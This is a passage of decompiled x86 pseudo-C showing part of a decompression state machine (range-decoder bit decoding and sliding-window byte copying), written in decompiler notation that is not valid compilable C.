                                                                    													__eax =  *(__ebp - 4);
                                                                    													__ecx =  *(__ebp - 0x38);
                                                                    													 *(__ebp - 0x84) = 0xa;
                                                                    													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                    												} else {
                                                                    													__eax =  *(__ebp - 0x38);
                                                                    													__ecx =  *(__ebp - 4);
                                                                    													__eax =  *(__ebp - 0x38) + 0xf;
                                                                    													 *(__ebp - 0x84) = 9;
                                                                    													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                    													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                    												}
                                                                    												while(1) {
                                                                    													L132:
                                                                    													 *(_t621 - 0x54) = _t614;
                                                                    													goto L133;
                                                                    												}
                                                                    											case 9:
                                                                    												__eflags =  *(__ebp - 0x40);
                                                                    												if( *(__ebp - 0x40) != 0) {
                                                                    													goto L89;
                                                                    												}
                                                                    												__eflags =  *(__ebp - 0x60);
                                                                    												if( *(__ebp - 0x60) == 0) {
                                                                    													goto L171;
                                                                    												}
                                                                    												__eax = 0;
                                                                    												__eflags =  *(__ebp - 0x38) - 7;
                                                                    												_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                    												__eflags = _t258;
                                                                    												0 | _t258 = _t258 + _t258 + 9;
                                                                    												 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                    												goto L75;
                                                                    											case 0xa:
                                                                    												__eflags =  *(__ebp - 0x40);
                                                                    												if( *(__ebp - 0x40) != 0) {
                                                                    													__eax =  *(__ebp - 4);
                                                                    													__ecx =  *(__ebp - 0x38);
                                                                    													 *(__ebp - 0x84) = 0xb;
                                                                    													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                    													while(1) {
                                                                    														L132:
                                                                    														 *(_t621 - 0x54) = _t614;
                                                                    														goto L133;
                                                                    													}
                                                                    												}
                                                                    												__eax =  *(__ebp - 0x28);
                                                                    												goto L88;
                                                                    											case 0xb:
                                                                    												__eflags =  *(__ebp - 0x40);
                                                                    												if( *(__ebp - 0x40) != 0) {
                                                                    													__ecx =  *(__ebp - 0x24);
                                                                    													__eax =  *(__ebp - 0x20);
                                                                    													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                    												} else {
                                                                    													__eax =  *(__ebp - 0x24);
                                                                    												}
                                                                    												__ecx =  *(__ebp - 0x28);
                                                                    												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                    												L88:
                                                                    												__ecx =  *(__ebp - 0x2c);
                                                                    												 *(__ebp - 0x2c) = __eax;
                                                                    												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                    												L89:
                                                                    												__eax =  *(__ebp - 4);
                                                                    												 *(__ebp - 0x80) = 0x15;
                                                                    												__eax =  *(__ebp - 4) + 0xa68;
                                                                    												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                    												goto L68;
                                                                    											case 0xc:
                                                                    												L99:
                                                                    												__eflags =  *(__ebp - 0x6c);
                                                                    												if( *(__ebp - 0x6c) == 0) {
                                                                    													 *(__ebp - 0x88) = 0xc;
                                                                    													goto L170;
                                                                    												}
                                                                    												__ecx =  *(__ebp - 0x70);
                                                                    												__eax =  *(__ebp - 0xc);
                                                                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                    												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                    												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    												_t334 = __ebp - 0x70;
                                                                    												 *_t334 =  *(__ebp - 0x70) + 1;
                                                                    												__eflags =  *_t334;
                                                                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    												__eax =  *(__ebp - 0x2c);
                                                                    												goto L101;
                                                                    											case 0xd:
                                                                    												L37:
                                                                    												__eflags =  *(__ebp - 0x6c);
                                                                    												if( *(__ebp - 0x6c) == 0) {
                                                                    													 *(__ebp - 0x88) = 0xd;
                                                                    													goto L170;
                                                                    												}
                                                                    												__ecx =  *(__ebp - 0x70);
                                                                    												__eax =  *(__ebp - 0xc);
                                                                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                    												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                    												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    												_t122 = __ebp - 0x70;
                                                                    												 *_t122 =  *(__ebp - 0x70) + 1;
                                                                    												__eflags =  *_t122;
                                                                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    												L39:
                                                                    												__eax =  *(__ebp - 0x40);
                                                                    												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                    												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                    													goto L48;
                                                                    												}
                                                                    												__eflags = __ebx - 0x100;
                                                                    												if(__ebx >= 0x100) {
                                                                    													goto L54;
                                                                    												}
                                                                    												L41:
                                                                    												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                    												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                    												__ecx =  *(__ebp - 0x58);
                                                                    												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                    												 *(__ebp - 0x48) = __eax;
                                                                    												__eax = __eax + 1;
                                                                    												__eax = __eax << 8;
                                                                    												__eax = __eax + __ebx;
                                                                    												__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                    												__ax =  *__esi;
                                                                    												 *(__ebp - 0x54) = __esi;
                                                                    												__edx = __ax & 0x0000ffff;
                                                                    												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                    												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                    												if( *(__ebp - 0xc) >= __ecx) {
                                                                    													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                    													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                    													__cx = __ax;
                                                                    													 *(__ebp - 0x40) = 1;
                                                                    													__cx = __ax >> 5;
                                                                    													__eflags = __eax;
                                                                    													__ebx = __ebx + __ebx + 1;
                                                                    													 *__esi = __ax;
                                                                    												} else {
                                                                    													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                    													 *(__ebp - 0x10) = __ecx;
                                                                    													0x800 = 0x800 - __edx;
                                                                    													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                    													__ebx = __ebx + __ebx;
                                                                    													 *__esi = __cx;
                                                                    												}
                                                                    												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                    												 *(__ebp - 0x44) = __ebx;
                                                                    												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                    													goto L39;
                                                                    												} else {
                                                                    													goto L37;
                                                                    												}
                                                                    											case 0xe:
                                                                    												L46:
                                                                    												__eflags =  *(__ebp - 0x6c);
                                                                    												if( *(__ebp - 0x6c) == 0) {
                                                                    													 *(__ebp - 0x88) = 0xe;
                                                                    													goto L170;
                                                                    												}
                                                                    												__ecx =  *(__ebp - 0x70);
                                                                    												__eax =  *(__ebp - 0xc);
                                                                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                    												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                    												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    												_t156 = __ebp - 0x70;
                                                                    												 *_t156 =  *(__ebp - 0x70) + 1;
                                                                    												__eflags =  *_t156;
                                                                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    												while(1) {
                                                                    													L48:
                                                                    													__eflags = __ebx - 0x100;
                                                                    													if(__ebx >= 0x100) {
                                                                    														break;
                                                                    													}
                                                                    													__eax =  *(__ebp - 0x58);
                                                                    													__edx = __ebx + __ebx;
                                                                    													__ecx =  *(__ebp - 0x10);
                                                                    													__esi = __edx + __eax;
                                                                    													__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                    													__ax =  *__esi;
                                                                    													 *(__ebp - 0x54) = __esi;
                                                                    													__edi = __ax & 0x0000ffff;
                                                                    													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                    													__eflags =  *(__ebp - 0xc) - __ecx;
                                                                    													if( *(__ebp - 0xc) >= __ecx) {
                                                                    														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                    														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                    														__cx = __ax;
                                                                    														_t170 = __edx + 1; // 0x1
                                                                    														__ebx = _t170;
                                                                    														__cx = __ax >> 5;
                                                                    														__eflags = __eax;
                                                                    														 *__esi = __ax;
                                                                    													} else {
                                                                    														 *(__ebp - 0x10) = __ecx;
                                                                    														0x800 = 0x800 - __edi;
                                                                    														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                    														__ebx = __ebx + __ebx;
                                                                    														 *__esi = __cx;
                                                                    													}
                                                                    													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                    													 *(__ebp - 0x44) = __ebx;
                                                                    													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                    														continue;
                                                                    													} else {
                                                                    														goto L46;
                                                                    													}
                                                                    												}
                                                                    												L54:
                                                                    												_t173 = __ebp - 0x34;
                                                                    												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                    												__eflags =  *_t173;
                                                                    												goto L55;
                                                                    											case 0xf:
                                                                    												L58:
                                                                    												__eflags =  *(__ebp - 0x6c);
                                                                    												if( *(__ebp - 0x6c) == 0) {
                                                                    													 *(__ebp - 0x88) = 0xf;
                                                                    													goto L170;
                                                                    												}
                                                                    												__ecx =  *(__ebp - 0x70);
                                                                    												__eax =  *(__ebp - 0xc);
                                                                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                    												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                    												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    												_t203 = __ebp - 0x70;
                                                                    												 *_t203 =  *(__ebp - 0x70) + 1;
                                                                    												__eflags =  *_t203;
                                                                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    												L60:
                                                                    												__eflags = __ebx - 0x100;
                                                                    												if(__ebx >= 0x100) {
                                                                    													L55:
                                                                    													__al =  *(__ebp - 0x44);
                                                                    													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                    													goto L56;
                                                                    												}
                                                                    												L61:
                                                                    												__eax =  *(__ebp - 0x58);
                                                                    												__edx = __ebx + __ebx;
                                                                    												__ecx =  *(__ebp - 0x10);
                                                                    												__esi = __edx + __eax;
                                                                    												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                    												__ax =  *__esi;
                                                                    												 *(__ebp - 0x54) = __esi;
                                                                    												__edi = __ax & 0x0000ffff;
                                                                    												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                    												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                    												if( *(__ebp - 0xc) >= __ecx) {
                                                                    													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                    													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                    													__cx = __ax;
                                                                    													_t217 = __edx + 1; // 0x1
                                                                    													__ebx = _t217;
                                                                    													__cx = __ax >> 5;
                                                                    													__eflags = __eax;
                                                                    													 *__esi = __ax;
                                                                    												} else {
                                                                    													 *(__ebp - 0x10) = __ecx;
                                                                    													0x800 = 0x800 - __edi;
                                                                    													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                    													__ebx = __ebx + __ebx;
                                                                    													 *__esi = __cx;
                                                                    												}
                                                                    												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                    												 *(__ebp - 0x44) = __ebx;
                                                                    												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                    													goto L60;
                                                                    												} else {
                                                                    													goto L58;
                                                                    												}
                                                                    											case 0x10:
                                                                    												L109:
                                                                    												__eflags =  *(__ebp - 0x6c);
                                                                    												if( *(__ebp - 0x6c) == 0) {
                                                                    													 *(__ebp - 0x88) = 0x10;
                                                                    													goto L170;
                                                                    												}
                                                                    												__ecx =  *(__ebp - 0x70);
                                                                    												__eax =  *(__ebp - 0xc);
                                                                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                    												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                    												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    												_t365 = __ebp - 0x70;
                                                                    												 *_t365 =  *(__ebp - 0x70) + 1;
                                                                    												__eflags =  *_t365;
                                                                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    												goto L111;
                                                                    											case 0x11:
                                                                    												L68:
                                                                    												_t614 =  *(_t621 - 0x58);
                                                                    												 *(_t621 - 0x84) = 0x12;
                                                                    												while(1) {
                                                                    													L132:
                                                                    													 *(_t621 - 0x54) = _t614;
                                                                    													goto L133;
                                                                    												}
                                                                    											case 0x12:
                                                                    												__eflags =  *(__ebp - 0x40);
                                                                    												if( *(__ebp - 0x40) != 0) {
                                                                    													__eax =  *(__ebp - 0x58);
                                                                    													 *(__ebp - 0x84) = 0x13;
                                                                    													__esi =  *(__ebp - 0x58) + 2;
                                                                    													while(1) {
                                                                    														L132:
                                                                    														 *(_t621 - 0x54) = _t614;
                                                                    														goto L133;
                                                                    													}
                                                                    												}
                                                                    												__eax =  *(__ebp - 0x4c);
                                                                    												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                    												__ecx =  *(__ebp - 0x58);
                                                                    												__eax =  *(__ebp - 0x4c) << 4;
                                                                    												__eflags = __eax;
                                                                    												__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                    												goto L130;
                                                                    											case 0x13:
                                                                    												__eflags =  *(__ebp - 0x40);
                                                                    												if( *(__ebp - 0x40) != 0) {
                                                                    													_t469 = __ebp - 0x58;
                                                                    													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                    													__eflags =  *_t469;
                                                                    													 *(__ebp - 0x30) = 0x10;
                                                                    													 *(__ebp - 0x40) = 8;
                                                                    													L144:
                                                                    													 *(__ebp - 0x7c) = 0x14;
                                                                    													goto L145;
                                                                    												}
                                                                    												__eax =  *(__ebp - 0x4c);
                                                                    												__ecx =  *(__ebp - 0x58);
                                                                    												__eax =  *(__ebp - 0x4c) << 4;
                                                                    												 *(__ebp - 0x30) = 8;
                                                                    												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                    												L130:
                                                                    												 *(__ebp - 0x58) = __eax;
                                                                    												 *(__ebp - 0x40) = 3;
                                                                    												goto L144;
                                                                    											case 0x14:
                                                                    												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                    												__eax =  *(__ebp - 0x80);
                                                                    												 *(_t621 - 0x88) = _t542;
                                                                    												goto L1;
                                                                    											case 0x15:
                                                                    												__eax = 0;
                                                                    												__eflags =  *(__ebp - 0x38) - 7;
                                                                    												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                    												__al = __al & 0x000000fd;
                                                                    												__eax = (__eflags >= 0) - 1 + 0xb;
                                                                    												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                    												goto L120;
                                                                    											case 0x16:
                                                                    												__eax =  *(__ebp - 0x30);
                                                                    												__eflags = __eax - 4;
                                                                    												if(__eax >= 4) {
                                                                    													_push(3);
                                                                    													_pop(__eax);
                                                                    												}
                                                                    												__ecx =  *(__ebp - 4);
                                                                    												 *(__ebp - 0x40) = 6;
                                                                    												__eax = __eax << 7;
                                                                    												 *(__ebp - 0x7c) = 0x19;
                                                                    												 *(__ebp - 0x58) = __eax;
                                                                    												goto L145;
                                                                    											case 0x17:
                                                                    												L145:
                                                                    												__eax =  *(__ebp - 0x40);
                                                                    												 *(__ebp - 0x50) = 1;
                                                                    												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                    												goto L149;
                                                                    											case 0x18:
                                                                    												L146:
                                                                    												__eflags =  *(__ebp - 0x6c);
                                                                    												if( *(__ebp - 0x6c) == 0) {
                                                                    													 *(__ebp - 0x88) = 0x18;
                                                                    													goto L170;
                                                                    												}
                                                                    												__ecx =  *(__ebp - 0x70);
                                                                    												__eax =  *(__ebp - 0xc);
                                                                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                    												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                    												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    												_t484 = __ebp - 0x70;
                                                                    												 *_t484 =  *(__ebp - 0x70) + 1;
                                                                    												__eflags =  *_t484;
                                                                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    												L148:
                                                                    												_t487 = __ebp - 0x48;
                                                                    												 *_t487 =  *(__ebp - 0x48) - 1;
                                                                    												__eflags =  *_t487;
                                                                    												L149:
                                                                    												__eflags =  *(__ebp - 0x48);
                                                                    												if( *(__ebp - 0x48) <= 0) {
                                                                    													__ecx =  *(__ebp - 0x40);
                                                                    													__ebx =  *(__ebp - 0x50);
                                                                    													0 = 1;
                                                                    													__eax = 1 << __cl;
                                                                    													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                    													__eax =  *(__ebp - 0x7c);
                                                                    													 *(__ebp - 0x44) = __ebx;
                                                                    													while(1) {
                                                                    														 *(_t621 - 0x88) = _t542;
                                                                    														goto L1;
                                                                    													}
                                                                    												}
                                                                    												__eax =  *(__ebp - 0x50);
                                                                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                    												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                    												__eax =  *(__ebp - 0x58);
                                                                    												__esi = __edx + __eax;
                                                                    												 *(__ebp - 0x54) = __esi;
                                                                    												__ax =  *__esi;
                                                                    												__edi = __ax & 0x0000ffff;
                                                                    												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                    												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                    												if( *(__ebp - 0xc) >= __ecx) {
                                                                    													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                    													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                    													__cx = __ax;
                                                                    													__cx = __ax >> 5;
                                                                    													__eax = __eax - __ecx;
                                                                    													__edx = __edx + 1;
                                                                    													__eflags = __edx;
                                                                    													 *__esi = __ax;
                                                                    													 *(__ebp - 0x50) = __edx;
                                                                    												} else {
                                                                    													 *(__ebp - 0x10) = __ecx;
                                                                    													0x800 = 0x800 - __edi;
                                                                    													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                    													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                    													 *__esi = __cx;
                                                                    												}
                                                                    												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                    												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                    													goto L148;
                                                                    												} else {
                                                                    													goto L146;
                                                                    												}
                                                                    											case 0x19:
                                                                    												__eflags = __ebx - 4;
                                                                    												if(__ebx < 4) {
                                                                    													 *(__ebp - 0x2c) = __ebx;
                                                                    													L119:
                                                                    													_t393 = __ebp - 0x2c;
                                                                    													 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                    													__eflags =  *_t393;
                                                                    													L120:
                                                                    													__eax =  *(__ebp - 0x2c);
                                                                    													__eflags = __eax;
                                                                    													if(__eax == 0) {
                                                                    														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                    														goto L170;
                                                                    													}
                                                                    													__eflags = __eax -  *(__ebp - 0x60);
                                                                    													if(__eax >  *(__ebp - 0x60)) {
                                                                    														goto L171;
                                                                    													}
                                                                    													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                    													__eax =  *(__ebp - 0x30);
                                                                    													_t400 = __ebp - 0x60;
                                                                    													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                    													__eflags =  *_t400;
                                                                    													goto L123;
                                                                    												}
                                                                    												__ecx = __ebx;
                                                                    												__eax = __ebx;
                                                                    												__ecx = __ebx >> 1;
                                                                    												__eax = __ebx & 0x00000001;
                                                                    												__ecx = (__ebx >> 1) - 1;
                                                                    												__al = __al | 0x00000002;
                                                                    												__eax = (__ebx & 0x00000001) << __cl;
                                                                    												__eflags = __ebx - 0xe;
                                                                    												 *(__ebp - 0x2c) = __eax;
                                                                    												if(__ebx >= 0xe) {
                                                                    													__ebx = 0;
                                                                    													 *(__ebp - 0x48) = __ecx;
                                                                    													L102:
                                                                    													__eflags =  *(__ebp - 0x48);
                                                                    													if( *(__ebp - 0x48) <= 0) {
                                                                    														__eax = __eax + __ebx;
                                                                    														 *(__ebp - 0x40) = 4;
                                                                    														 *(__ebp - 0x2c) = __eax;
                                                                    														__eax =  *(__ebp - 4);
                                                                    														__eax =  *(__ebp - 4) + 0x644;
                                                                    														__eflags = __eax;
                                                                    														L108:
                                                                    														__ebx = 0;
                                                                    														 *(__ebp - 0x58) = __eax;
                                                                    														 *(__ebp - 0x50) = 1;
                                                                    														 *(__ebp - 0x44) = 0;
                                                                    														 *(__ebp - 0x48) = 0;
                                                                    														L112:
                                                                    														__eax =  *(__ebp - 0x40);
                                                                    														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                    														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                    															_t391 = __ebp - 0x2c;
                                                                    															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                    															__eflags =  *_t391;
                                                                    															goto L119;
                                                                    														}
                                                                    														__eax =  *(__ebp - 0x50);
                                                                    														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                    														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                    														__eax =  *(__ebp - 0x58);
                                                                    														__esi = __edi + __eax;
                                                                    														 *(__ebp - 0x54) = __esi;
                                                                    														__ax =  *__esi;
                                                                    														__ecx = __ax & 0x0000ffff;
                                                                    														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                    														__eflags =  *(__ebp - 0xc) - __edx;
                                                                    														if( *(__ebp - 0xc) >= __edx) {
                                                                    															__ecx = 0;
                                                                    															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                    															__ecx = 1;
                                                                    															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                    															__ebx = 1;
                                                                    															__ecx =  *(__ebp - 0x48);
                                                                    															__ebx = 1 << __cl;
                                                                    															__ecx = 1 << __cl;
                                                                    															__ebx =  *(__ebp - 0x44);
                                                                    															__ebx =  *(__ebp - 0x44) | __ecx;
                                                                    															__cx = __ax;
                                                                    															__cx = __ax >> 5;
                                                                    															__eax = __eax - __ecx;
                                                                    															__edi = __edi + 1;
                                                                    															__eflags = __edi;
                                                                    															 *(__ebp - 0x44) = __ebx;
                                                                    															 *__esi = __ax;
                                                                    															 *(__ebp - 0x50) = __edi;
                                                                    														} else {
                                                                    															 *(__ebp - 0x10) = __edx;
                                                                    															0x800 = 0x800 - __ecx;
                                                                    															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                    															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                    															 *__esi = __dx;
                                                                    														}
                                                                    														__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                    														if( *(__ebp - 0x10) >= 0x1000000) {
                                                                    															L111:
                                                                    															_t368 = __ebp - 0x48;
                                                                    															 *_t368 =  *(__ebp - 0x48) + 1;
                                                                    															__eflags =  *_t368;
                                                                    															goto L112;
                                                                    														} else {
                                                                    															goto L109;
                                                                    														}
                                                                    													}
                                                                    													__ecx =  *(__ebp - 0xc);
                                                                    													__ebx = __ebx + __ebx;
                                                                    													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                    													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                    													 *(__ebp - 0x44) = __ebx;
                                                                    													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                    														__ecx =  *(__ebp - 0x10);
                                                                    														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                    														__ebx = __ebx | 0x00000001;
                                                                    														__eflags = __ebx;
                                                                    														 *(__ebp - 0x44) = __ebx;
                                                                    													}
                                                                    													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                    													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                    														L101:
                                                                    														_t338 = __ebp - 0x48;
                                                                    														 *_t338 =  *(__ebp - 0x48) - 1;
                                                                    														__eflags =  *_t338;
                                                                    														goto L102;
                                                                    													} else {
                                                                    														goto L99;
                                                                    													}
                                                                    												}
                                                                    												__edx =  *(__ebp - 4);
                                                                    												__eax = __eax - __ebx;
                                                                    												 *(__ebp - 0x40) = __ecx;
                                                                    												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                    												goto L108;
                                                                    											case 0x1a:
                                                                    												L56:
                                                                    												__eflags =  *(__ebp - 0x64);
                                                                    												if( *(__ebp - 0x64) == 0) {
                                                                    													 *(__ebp - 0x88) = 0x1a;
                                                                    													goto L170;
                                                                    												}
                                                                    												__ecx =  *(__ebp - 0x68);
                                                                    												__al =  *(__ebp - 0x5c);
                                                                    												__edx =  *(__ebp - 8);
                                                                    												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                    												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                    												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                    												 *( *(__ebp - 0x68)) = __al;
                                                                    												__ecx =  *(__ebp - 0x14);
                                                                    												 *(__ecx +  *(__ebp - 8)) = __al;
                                                                    												__eax = __ecx + 1;
                                                                    												__edx = 0;
                                                                    												_t192 = __eax %  *(__ebp - 0x74);
                                                                    												__eax = __eax /  *(__ebp - 0x74);
                                                                    												__edx = _t192;
                                                                    												goto L79;
                                                                    											case 0x1b:
                                                                    												L75:
                                                                    												__eflags =  *(__ebp - 0x64);
                                                                    												if( *(__ebp - 0x64) == 0) {
                                                                    													 *(__ebp - 0x88) = 0x1b;
                                                                    													goto L170;
                                                                    												}
                                                                    												__eax =  *(__ebp - 0x14);
                                                                    												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                    												__eflags = __eax -  *(__ebp - 0x74);
                                                                    												if(__eax >=  *(__ebp - 0x74)) {
                                                                    													__eax = __eax +  *(__ebp - 0x74);
                                                                    													__eflags = __eax;
                                                                    												}
                                                                    												__edx =  *(__ebp - 8);
                                                                    												__cl =  *(__eax + __edx);
                                                                    												__eax =  *(__ebp - 0x14);
                                                                    												 *(__ebp - 0x5c) = __cl;
                                                                    												 *(__eax + __edx) = __cl;
                                                                    												__eax = __eax + 1;
                                                                    												__edx = 0;
                                                                    												_t274 = __eax %  *(__ebp - 0x74);
                                                                    												__eax = __eax /  *(__ebp - 0x74);
                                                                    												__edx = _t274;
                                                                    												__eax =  *(__ebp - 0x68);
                                                                    												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                    												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                    												_t283 = __ebp - 0x64;
                                                                    												 *_t283 =  *(__ebp - 0x64) - 1;
                                                                    												__eflags =  *_t283;
                                                                    												 *( *(__ebp - 0x68)) = __cl;
                                                                    												L79:
                                                                    												 *(__ebp - 0x14) = __edx;
                                                                    												goto L80;
                                                                    											case 0x1c:
                                                                    												while(1) {
                                                                    													L123:
                                                                    													__eflags =  *(__ebp - 0x64);
                                                                    													if( *(__ebp - 0x64) == 0) {
                                                                    														break;
                                                                    													}
                                                                    													__eax =  *(__ebp - 0x14);
                                                                    													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                    													__eflags = __eax -  *(__ebp - 0x74);
                                                                    													if(__eax >=  *(__ebp - 0x74)) {
                                                                    														__eax = __eax +  *(__ebp - 0x74);
                                                                    														__eflags = __eax;
                                                                    													}
